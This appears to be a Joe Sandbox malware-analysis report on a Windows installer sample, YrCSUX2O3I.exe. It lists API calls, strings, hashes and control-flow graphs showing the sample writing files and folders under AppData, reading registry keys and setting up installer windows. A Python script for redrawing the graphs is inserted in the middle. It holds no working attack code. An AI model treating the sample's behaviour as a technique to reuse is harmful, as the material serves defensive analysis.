                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: AddressHandleLibraryLoadModuleProc
                                                            • String ID:
                                                            • API String ID: 310444273-0
                                                            • Opcode ID: 5679b5def2f7da251302a8cf4847d9d0b7faea0d144796f5e929e2ea3512b209
                                                            • Instruction ID: 8a2f4544d0f7460eb2636e635d5deeba11c8ac6a6071c480d08d1599e38ef1a2
                                                            • Opcode Fuzzy Hash: 5679b5def2f7da251302a8cf4847d9d0b7faea0d144796f5e929e2ea3512b209
                                                            • Instruction Fuzzy Hash: C3E0CD326002309BC3204B30AE4497773EC9F98640305043EF645F6000CB74DC22EF69
                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(?,00430248,0042FA00,004058FF,0042FA00,0042FA00,00000000,0042FA00,0042FA00,?,?,76F93420,004055F5,?,C:\Users\user\AppData\Local\Temp\,76F93420), ref: 00406094
                                                            • FindClose.KERNELBASE(00000000), ref: 004060A0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID:
                                                            • API String ID: 2295610775-0
                                                            • Opcode ID: 9c2bed4397a3bf892ba140cd3fe5090782190f2fd0e109c23d43d293603923f5
                                                            • Instruction ID: 8c9aebf9a212da5294cb1f82767a4f5960c49382cb163a998aea3b369420c93e
                                                            • Opcode Fuzzy Hash: 9c2bed4397a3bf892ba140cd3fe5090782190f2fd0e109c23d43d293603923f5
                                                            • Instruction Fuzzy Hash: B2D012716585209BC7905738AE0C84B7A98AF593717224B36F46BF22E0CB3C8C66869C

                                                            Control-flow Graph (function entry 00403ABD; executed / not-executed basic blocks; edge list omitted)
                                                            APIs
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403AF9
                                                            • ShowWindow.USER32(?), ref: 00403B16
                                                            • DestroyWindow.USER32 ref: 00403B2A
                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403B46
                                                            • GetDlgItem.USER32(?,?), ref: 00403B67
                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403B7B
                                                            • IsWindowEnabled.USER32(00000000), ref: 00403B82
                                                            • GetDlgItem.USER32(?,00000001), ref: 00403C30
                                                            • GetDlgItem.USER32(?,00000002), ref: 00403C3A
                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00403C54
                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403CA5
                                                            • GetDlgItem.USER32(?,00000003), ref: 00403D4B
                                                            • ShowWindow.USER32(00000000,?), ref: 00403D6C
                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403D7E
                                                            • EnableWindow.USER32(?,?), ref: 00403D99
                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403DAF
                                                            • EnableMenuItem.USER32(00000000), ref: 00403DB6
                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403DCE
                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403DE1
                                                            • lstrlenW.KERNEL32(0042D1F8,?,0042D1F8,00433EA0), ref: 00403E0A
                                                            • SetWindowTextW.USER32(?,0042D1F8), ref: 00403E1E
                                                            • ShowWindow.USER32(?,0000000A), ref: 00403F52
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                            • String ID: QM
                                                            • API String ID: 3282139019-1341965732
                                                            • Opcode ID: 8e1e93e696dc9d9bf908262f32253b95ed2efac643936c27f45201f4937cad5a
                                                            • Instruction ID: 9063085a3fd87244c99a969d1f6d2bb761e88773988a4a67d8464f71257f90be
                                                            • Opcode Fuzzy Hash: 8e1e93e696dc9d9bf908262f32253b95ed2efac643936c27f45201f4937cad5a
                                                            • Instruction Fuzzy Hash: 7BC1CD71900305BFDB216F65EE8AE2A3E7CFB4970AB14043EF641B11E1CB7999429B1D

                                                            Control-flow Graph (function entry 0040371A; executed / not-executed basic blocks; edge list omitted)
                                                            APIs
                                                              • Part of subcall function 004060B0: GetModuleHandleA.KERNEL32(?,?,00000020,00403220,00000008), ref: 004060C2
                                                              • Part of subcall function 004060B0: LoadLibraryA.KERNELBASE(?,?,00000020,00403220,00000008), ref: 004060CD
                                                              • Part of subcall function 004060B0: GetProcAddress.KERNEL32(00000000,?), ref: 004060DE
                                                            • lstrcatW.KERNEL32(1033,0042D1F8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D1F8,00000000,00000006,C:\Users\user\AppData\Local\Temp\,76F93420,00000000,"C:\Users\user\Desktop\YrCSUX2O3I.exe"), ref: 0040379B
                                                            • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\Polysulfonate\sangersken,1033,0042D1F8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D1F8,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 0040381B
                                                            • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\Polysulfonate\sangersken,1033,0042D1F8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D1F8,00000000), ref: 0040382E
                                                            • GetFileAttributesW.KERNEL32(: Completed), ref: 00403839
                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Polysulfonate\sangersken), ref: 00403882
                                                              • Part of subcall function 00405C8D: wsprintfW.USER32 ref: 00405C9A
                                                            • RegisterClassW.USER32(00433E40), ref: 004038BF
                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004038D7
                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 0040390C
                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403942
                                                            • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403953
                                                            • LoadLibraryW.KERNEL32(RichEd32), ref: 0040395E
                                                            • GetClassInfoW.USER32(00000000,RichEdit20A,00433E40), ref: 0040396E
                                                            • GetClassInfoW.USER32(00000000,RichEdit,00433E40), ref: 0040397B
                                                            • RegisterClassW.USER32(00433E40), ref: 00403984
                                                            • DialogBoxParamW.USER32(?,00000000,00403ABD,00000000), ref: 004039A3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                            • String ID: "C:\Users\user\Desktop\YrCSUX2O3I.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$@>C$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Polysulfonate\sangersken$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                            • API String ID: 914957316-1842538388
                                                            • Opcode ID: 0aa4beac196019a4959303d62d6cbf1607d52bd303ace0c241830d38af164bbc
                                                            • Instruction ID: f2efbd8b4e2183f22d1c30e2af872408ecd3ec1be094dd46b245239935a3b56e
                                                            • Opcode Fuzzy Hash: 0aa4beac196019a4959303d62d6cbf1607d52bd303ace0c241830d38af164bbc
                                                            • Instruction Fuzzy Hash: 9B61D771100700AED320BF669D46F2B3AACEB85B46F10403FF941B62E2DBB95941CB2D

Control-flow Graph
[Graph for the function at 00402CFF; the rendered image and its executed/not-executed colour legend are not reproduced in text]
APIs
• GetTickCount.KERNEL32 ref: 00402D10
• GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\YrCSUX2O3I.exe,00000400,?,?,?,00000000,004033FE,?), ref: 00402D2C
  • Part of subcall function 004059CF: GetFileAttributesW.KERNELBASE(00000003,00402D3F,C:\Users\user\Desktop\YrCSUX2O3I.exe,80000000,00000003,?,?,?,00000000,004033FE,?), ref: 004059D3
  • Part of subcall function 004059CF: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,004033FE,?), ref: 004059F5
• GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\YrCSUX2O3I.exe,C:\Users\user\Desktop\YrCSUX2O3I.exe,80000000,00000003,?,?,?,00000000,004033FE,?), ref: 00402D78
Strings
Memory Dump Source
• Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
Similarity
• API ID: File$AttributesCountCreateModuleNameSizeTick
• String ID: "C:\Users\user\Desktop\YrCSUX2O3I.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\YrCSUX2O3I.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
• API String ID: 4283519449-1153457532
• Opcode ID: 8f28a7fd6c0e7d3444f95869c0558a3ff55555bbefce27c9d00e146f9aea9c7c
• Instruction ID: 77e1e34d23ec3cd6b8d0d5fd72658ee77a79da899d912ccb87991cca2eeb2408
• Opcode Fuzzy Hash: 8f28a7fd6c0e7d3444f95869c0558a3ff55555bbefce27c9d00e146f9aea9c7c
• Instruction Fuzzy Hash: 0051D471944218AFDB109F65DE89B9F7AB8FB14358F10403BFA04B62D0C7B89D418B9D

Control-flow Graph
[Graph for the function at 00401752; the rendered image and its executed/not-executed colour legend are not reproduced in text]
APIs
• lstrcatW.KERNEL32(00000000,00000000,Generic,C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Skolevsens,?,?,00000031), ref: 00401793
• CompareFileTime.KERNEL32(-00000014,?,Generic,Generic,00000000,00000000,Generic,C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Skolevsens,?,?,00000031), ref: 004017B8
  • Part of subcall function 00405D46: lstrcpynW.KERNEL32(?,?,00000400,0040324B,00433EA0,NSIS Error), ref: 00405D53
  • Part of subcall function 00404FFA: lstrlenW.KERNEL32(Frisurens,00000000,0041C0DD,76F923A0,?,?,?,?,?,?,?,?,?,0040309B,00000000,?), ref: 00405032
  • Part of subcall function 00404FFA: lstrlenW.KERNEL32(0040309B,Frisurens,00000000,0041C0DD,76F923A0,?,?,?,?,?,?,?,?,?,0040309B,00000000), ref: 00405042
  • Part of subcall function 00404FFA: lstrcatW.KERNEL32(Frisurens,0040309B,0040309B,Frisurens,00000000,0041C0DD,76F923A0), ref: 00405055
  • Part of subcall function 00404FFA: SetWindowTextW.USER32(Frisurens,Frisurens), ref: 00405067
  • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040508D
  • Part of subcall function 00404FFA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050A7
  • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001013,?,00000000), ref: 004050B5
Strings
Memory Dump Source
• Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
Similarity
• API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
• String ID: C:\Program Files (x86)\edelweissen\romanblade.ini$C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Skolevsens$Generic$Heteric
• API String ID: 1941528284-407415454
• Opcode ID: c41d853cd82c4e4dfdb8920349454b92991ee92d33bc5413693936f55365b64f
• Instruction ID: d3e4dca81327e3df0df284c572be3abc4bccaf2f3cb66fe1cef89d7a827d5624
• Opcode Fuzzy Hash: c41d853cd82c4e4dfdb8920349454b92991ee92d33bc5413693936f55365b64f
• Instruction Fuzzy Hash: 9B419171900505BBCF10BBB5DC8ADAF3665EF06369B20823BF012B11E1D63C8A519A6D

Control-flow Graph
[Graph for the function at 00402F38; the rendered image and its executed/not-executed colour legend are not reproduced in text]
APIs
• GetTickCount.KERNEL32 ref: 00402FA3
• GetTickCount.KERNEL32 ref: 00403048
• MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403071
• wsprintfW.USER32 ref: 00403084
• WriteFile.KERNELBASE(00000000,00000000,0041C0DD,00402ED2,00000000), ref: 004030B5
Strings
Memory Dump Source
• Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
Similarity
• API ID: CountTick$FileWritewsprintf
• String ID: ... %d%%$znA
• API String ID: 4209647438-2447772013
• Opcode ID: 61ddf02fd636ed85020eb85095074430f0604a488243a9e3d908ba4f2f9dd09b
• Instruction ID: 34a6cf203725df572fb249859d8c599c0d8718bcf9279d6af528d8a937ec08d1
• Opcode Fuzzy Hash: 61ddf02fd636ed85020eb85095074430f0604a488243a9e3d908ba4f2f9dd09b
• Instruction Fuzzy Hash: 53617B71901219EBCB10DFA5DA4469F7FB8AF08355F10453BE914BB2C0D7789E40DBA9

Control-flow Graph
[Graph for the function at 00404FFA; the rendered image and its executed/not-executed colour legend are not reproduced in text]
APIs
• lstrlenW.KERNEL32(Frisurens,00000000,0041C0DD,76F923A0,?,?,?,?,?,?,?,?,?,0040309B,00000000,?), ref: 00405032
• lstrlenW.KERNEL32(0040309B,Frisurens,00000000,0041C0DD,76F923A0,?,?,?,?,?,?,?,?,?,0040309B,00000000), ref: 00405042
• lstrcatW.KERNEL32(Frisurens,0040309B,0040309B,Frisurens,00000000,0041C0DD,76F923A0), ref: 00405055
• SetWindowTextW.USER32(Frisurens,Frisurens), ref: 00405067
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040508D
• SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050A7
• SendMessageW.USER32(?,00001013,?,00000000), ref: 004050B5
Strings
Memory Dump Source
• Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
Similarity
• API ID: MessageSend$lstrlen$TextWindowlstrcat
• String ID: Frisurens
• API String ID: 2531174081-3121014363
• Opcode ID: 671efdfc4b123df1b42670911b49c5f72c5e00122fc07205780e32bafcf4a041
• Instruction ID: 2c8a209b838051fcdbb8fb1d9598827595890bd21b84812adf7dff8cdb9255f5
• Opcode Fuzzy Hash: 671efdfc4b123df1b42670911b49c5f72c5e00122fc07205780e32bafcf4a041
• Instruction Fuzzy Hash: E1216071900618BADB219F65DD859DFBFB9EF45750F14803AF904B62A0C3794A40CF98

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 680 4015b9-4015cd call 402ad0 call 405859 685 401614-401617 680->685 686 4015cf-4015eb call 4057db CreateDirectoryW 680->686 687 401646-402195 call 401423 685->687 688 401619-401638 call 401423 call 405d46 SetCurrentDirectoryW 685->688 693 40160a-401612 686->693 694 4015ed-4015f8 GetLastError 686->694 702 402729-402730 687->702 703 40295d-40296c 687->703 688->703 704 40163e-401641 688->704 693->685 693->686 697 401607 694->697 698 4015fa-401605 GetFileAttributesW 694->698 697->693 698->693 698->697 702->703 704->703
                                                            APIs
                                                              • Part of subcall function 00405859: CharNextW.USER32(?,?,0042FA00,?,004058CD,0042FA00,0042FA00,?,?,76F93420,004055F5,?,C:\Users\user\AppData\Local\Temp\,76F93420,"C:\Users\user\Desktop\YrCSUX2O3I.exe"), ref: 00405867
                                                              • Part of subcall function 00405859: CharNextW.USER32(00000000), ref: 0040586C
                                                              • Part of subcall function 00405859: CharNextW.USER32(00000000), ref: 00405884
                                                            • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                            • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                            • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Skolevsens,?,00000000,000000F0), ref: 00401630
                                                            Strings
                                                            • C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Skolevsens, xrefs: 00401623
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                            • String ID: C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Skolevsens
                                                            • API String ID: 3751793516-1921291325
                                                            • Opcode ID: 06e8dec69cecf1aed292983b268229df3b0dc48255432652a051c134e1b2d356
                                                            • Instruction ID: 35652dd05d7f301adf099aa328e5cc987f695832d4750e36514a93e4da09e5cd
                                                            • Opcode Fuzzy Hash: 06e8dec69cecf1aed292983b268229df3b0dc48255432652a051c134e1b2d356
                                                            • Instruction Fuzzy Hash: B9113231600115EBCB206FA0DD44AAE3BB0EF053A9B24053BF882B22E0D6394981DB5D
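The `control_flow_graph` records on this page are the flattened text of the report's rendered graphs: a block id, its address range, any `call` targets and named API calls inside the block, then `src->dst` edges. The following Python script is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses that text back into basic blocks and edges, identifies the entry and exit blocks, and emits Graphviz DOT so the graph can be redrawn. The sample text is the graph of the function at 4015b9 copied from above; the tokenising rules (a bare decimal token opens a block and the token after it is always its address range, the token after `call` is always a callee address) and the DOT layout are this script's own assumptions.

```python
"""Rebuild a Joe Sandbox control-flow graph from its flattened text form.

Added example, not part of the report. The graph text below is copied from the
report's record for the function at 4015b9; parsing rules and DOT output are
this script's own.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed sample: the flattened graph text exactly as it appears in the report.
CFG_TEXT = (
    "control_flow_graph 680 4015b9-4015cd call 402ad0 call 405859 "
    "685 401614-401617 680->685 686 4015cf-4015eb call 4057db CreateDirectoryW 680->686 "
    "687 401646-402195 call 401423 685->687 "
    "688 401619-401638 call 401423 call 405d46 SetCurrentDirectoryW 685->688 "
    "693 40160a-401612 686->693 694 4015ed-4015f8 GetLastError 686->694 "
    "702 402729-402730 687->702 703 40295d-40296c 687->703 688->703 "
    "704 40163e-401641 688->704 693->685 693->686 697 401607 694->697 "
    "698 4015fa-401605 GetFileAttributesW 694->698 697->693 698->693 698->697 "
    "702->703 704->703"
)

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
NODE_ID_RE = re.compile(r"^\d+$")
ADDR_RE = re.compile(r"^[0-9a-f]+(?:-[0-9a-f]+)?$")


@dataclass
class Block:
    ident: int
    addr_range: str
    calls: List[str] = field(default_factory=list)  # 'call <addr>' targets inside the block
    apis: List[str] = field(default_factory=list)   # named Win32 API calls inside the block


def parse_cfg(text: str) -> Tuple[Dict[int, Block], List[Tuple[int, int]]]:
    """Tokenise the flattened graph text into blocks and directed edges."""
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks: Dict[int, Block] = {}
    edges: List[Tuple[int, int]] = []
    current: Optional[Block] = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
        elif tok == "call":
            # The token after 'call' is the callee address, even when it looks decimal.
            i += 1
            if current is None or i >= len(tokens):
                raise ValueError("'call' outside a block")
            current.calls.append(tokens[i])
        elif NODE_ID_RE.match(tok):
            # A bare decimal token opens a block; the next token is its address range.
            i += 1
            if i >= len(tokens) or not ADDR_RE.match(tokens[i]):
                raise ValueError(f"block {tok} is not followed by an address range")
            current = Block(int(tok), tokens[i])
            blocks[current.ident] = current
        else:
            if current is None:
                raise ValueError(f"API name {tok!r} before any block")
            current.apis.append(tok)
        i += 1
    for src, dst in edges:
        if src not in blocks or dst not in blocks:
            raise ValueError(f"edge {src}->{dst} references an unknown block")
    return blocks, edges


def entry_and_exit_blocks(blocks: Dict[int, Block], edges: List[Tuple[int, int]]):
    """Blocks with no predecessor (entries) and no successor (exits)."""
    has_pred = {dst for _, dst in edges}
    has_succ = {src for src, _ in edges}
    entries = sorted(b for b in blocks if b not in has_pred)
    exits = sorted(b for b in blocks if b not in has_succ)
    return entries, exits


def to_dot(blocks: Dict[int, Block], edges: List[Tuple[int, int]], name: str = "cfg") -> str:
    """Render the graph as Graphviz DOT; one box per block, labelled with its calls."""
    lines = [f"digraph {name} {{", '  node [shape=box fontname="monospace"];']
    for b in sorted(blocks.values(), key=lambda blk: blk.ident):
        label = [f"{b.ident}: {b.addr_range}"] + [f"call {c}" for c in b.calls] + b.apis
        text = "\\n".join(label)  # literal \n is a line break inside a DOT label
        lines.append(f'  n{b.ident} [label="{text}"];')
    for src, dst in edges:
        lines.append(f"  n{src} -> n{dst};")
    lines.append("}")
    return "\n".join(lines)


if __name__ == "__main__":
    parsed_blocks, parsed_edges = parse_cfg(CFG_TEXT)
    print(entry_and_exit_blocks(parsed_blocks, parsed_edges))
    print(to_dot(parsed_blocks, parsed_edges))
```

Pipe the output into `dot -Tpng` to get the picture back; the entry/exit check is a quick way to confirm the text was parsed completely, since a truncated record shows up as extra blocks without successors.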

Control-flow Graph (basic blocks with their in-block calls and successor edges; the executed/not-executed colouring of the rendered graph is not preserved in text)
• 707: 405c13-405c45, RegOpenKeyExW -> 708, 709
• 708: 405c87-405c8a (no successors)
• 709: 405c47-405c66, RegQueryValueExW -> 710, 711
• 710: 405c74 -> 712
• 711: 405c68-405c6c -> 712, 713
• 712: 405c77-405c81, RegCloseKey -> 708
• 713: 405c6e-405c72 -> 710, 712
                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,: Completed,?,00405E86,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405C3D
                                                            • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00405E86,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405C5E
                                                            • RegCloseKey.ADVAPI32(?,?,00405E86,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405C81
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
